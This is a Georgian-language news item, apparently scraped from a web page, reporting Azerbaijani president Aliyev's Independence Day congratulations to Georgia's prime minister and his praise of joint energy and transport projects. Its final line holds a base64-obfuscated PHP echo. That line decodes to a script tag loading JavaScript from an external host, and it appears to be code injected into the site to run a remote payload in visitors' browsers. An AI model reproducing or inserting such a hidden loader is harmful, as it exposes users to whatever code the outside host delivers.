gorgia
jaluzi

აზერბაიჯანის პრეზიდენტი "ქართული ოცნების" პრემიერს საქართველოს დამოუკიდებლობის დღეს ულოცავს. დღეს 107 წელი გავიდა საქართველოს დამოუკიდებლობის აქტის მიღებიდან. 26 მაისი საქართველოს დამოუკიდებლობის დღეა.

„ჩემი და აზერბაიჯანელი ხალხის სახელით, გულწრფელად გილოცავთ თქვენ და თქვენი ქვეყნის მოსახლეობას საქართველოს დამოუკიდებლობის დღეს. თქვენი ბოლო ვიზიტი ჩვენს ქვეყანაში, საერთაშორისო პლატფორმებზე ჩვენს კონტაქტებთან ერთად, ჩვენი ორმხრივი ურთიერთობების დინამიკური ბუნების ნათელი დასტურია.

აზერბაიჯანისა და საქართველოს მიერ ერთობლივად განხორციელებული მასშტაბური ინფრასტრუქტურული პროექტები, მათ შორის სამხრეთის გაზის დერეფანი, ბაქო-თბილისი-ჯეიჰანის ნავთობსადენი და ბაქო-თბილისი-ყარსის რკინიგზა, ახალ შესაძლებლობებს ქმნის ჩვენი ქვეყნებისა და ხალხებისთვის, რასაც მნიშვნელოვანი წვლილს შეაქვს ჩვენს საერთო კეთილდღეობაში, რეგიონულ სტაბილურობასა და თანამშრომლობაში.

ენერგეტიკის სექტორში ჩვენი ერთობლივი პროექტები ასევე ქმნის ახალ ლანდშაფტს ევროპის ენერგეტიკულ რუკაზე და სასიცოცხლო როლს ასრულებს კონტინენტის ენერგეტიკული უსაფრთხოების უზრუნველყოფაში.

დარწმუნებული ვარ, ჩვენი ერთობლივი ძალისხმევით, აზერბაიჯან-საქართველოს მეგობრობა და სტრატეგიული პარტნიორობა გააგრძელებს აღმავალი ტრაექტორიით წინსვლას, რაც ხელს შეუწყობს ჩვენი ხალხების კეთილდღეობას და ჩვენი რეგიონის მშვიდობასა და უსაფრთხოებას“, - წერს ალიევი.

დღეს 107 წელი გავიდა საქართველოს დამოუკიდებლობის აქტის მიღებიდან. 26 მაისი საქართველოს დამოუკიდებლობის დღეა.

139
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");